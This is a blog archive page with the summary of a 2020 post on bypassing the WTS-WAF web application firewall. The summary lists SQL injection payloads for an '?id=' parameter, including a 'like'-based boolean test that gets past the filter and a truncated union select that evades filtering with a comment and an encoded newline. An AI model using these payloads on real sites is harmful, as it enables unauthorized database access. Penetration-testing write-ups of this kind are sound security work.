代码改变世界

随笔档案-2020年8月19日

bypass WTS-WAF(sql注入+文件上传)

2020-08-19 10:35 by rnss, 1977 阅读, 收藏,
摘要: sql注入 注入点:?id=13 payload: ?id=13'+and+'1'='1--+ 拦截 ?id=13'+and+1+like+1--+ 不拦截,正常回显 ?id=13'+and+1+like+2--+ 不拦截,回显异常 判断存在注入 ?id=-13' union select--%0a 阅读全文